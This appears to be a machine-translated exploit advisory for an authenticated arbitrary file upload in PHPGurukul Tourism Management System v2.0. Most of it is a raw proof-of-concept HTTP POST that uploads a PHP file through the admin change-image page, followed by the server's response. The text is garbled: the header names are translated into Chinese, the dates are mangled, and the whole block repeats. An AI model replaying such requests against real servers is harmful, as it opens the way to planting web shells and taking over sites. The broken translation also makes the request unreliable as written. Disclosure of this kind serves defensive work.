#利用标题:旅游管理系统v2.0-任意文件上传
#Google Dork: N/A
#利用作者: Sospiro
#日期: 2024-02-18
#供应商homepage: https://phpgurukul.com
#软件link: https://phpgurukul.com/tourism-management-system-free-download/
#版本: 2.0
#测试在: Windows 10 Pro
#Impact:允许管理员将所有文件上传到Web服务器
#CVE : N/A
#利用描述:
该应用程序容易出现任意文件,因为它无法充分消毒用户提供的输入。
#POC请求
post/zer/tms/admin/change-image.php?imgid=1 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:122.0)Gecko/20100101 Firefox/122.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=------------------------------------ 390927495111779706051786831201
内容长度: 361
Origin: http://localhost
连接:关闭
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
cookie: phpsessID=eqms3ipedmm41hqa1djnu1euhv
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
X-PWNFOX-COLOR:红色
-------------------------------------- 390927495111779706051786831201
content-disposition: form-data; name='package image';文件名='phpinfo.php'
content-type:文本/平原
php phpinfo();
-------------------------------------- 390927495111779706051786831201
content-disposition: form-data;名称='提交'
--------------------------------------- 390927495111779706051786831201-
=============================================================================================================
- 回复-
http/1.1 200好
Date: Sun,2024年2月18日04333333:37 GMT
server: apache/2.4.54(win64)php/8.1.13 mod_fcgid/2.3.10-dev
X-Power-By-By: PHP/8.1.13
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 8146
======================================================================================================================
- 文件位置-
#Google Dork: N/A
#利用作者: Sospiro
#日期: 2024-02-18
#供应商homepage: https://phpgurukul.com
#软件link: https://phpgurukul.com/tourism-management-system-free-download/
#版本: 2.0
#测试在: Windows 10 Pro
#Impact:允许管理员将所有文件上传到Web服务器
#CVE : N/A
#利用描述:
该应用程序容易出现任意文件,因为它无法充分消毒用户提供的输入。
#POC请求
post/zer/tms/admin/change-image.php?imgid=1 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:122.0)Gecko/20100101 Firefox/122.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=------------------------------------ 390927495111779706051786831201
内容长度: 361
Origin: http://localhost
连接:关闭
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
cookie: phpsessID=eqms3ipedmm41hqa1djnu1euhv
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
X-PWNFOX-COLOR:红色
-------------------------------------- 390927495111779706051786831201
content-disposition: form-data; name='package image';文件名='phpinfo.php'
content-type:文本/平原
php phpinfo();
-------------------------------------- 390927495111779706051786831201
content-disposition: form-data;名称='提交'
--------------------------------------- 390927495111779706051786831201-
=============================================================================================================
- 回复-
http/1.1 200好
Date: Sun,2024年2月18日04333333:37 GMT
server: apache/2.4.54(win64)php/8.1.13 mod_fcgid/2.3.10-dev
X-Power-By-By: PHP/8.1.13
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 8146
======================================================================================================================
- 文件位置-
正在加载...
localhost
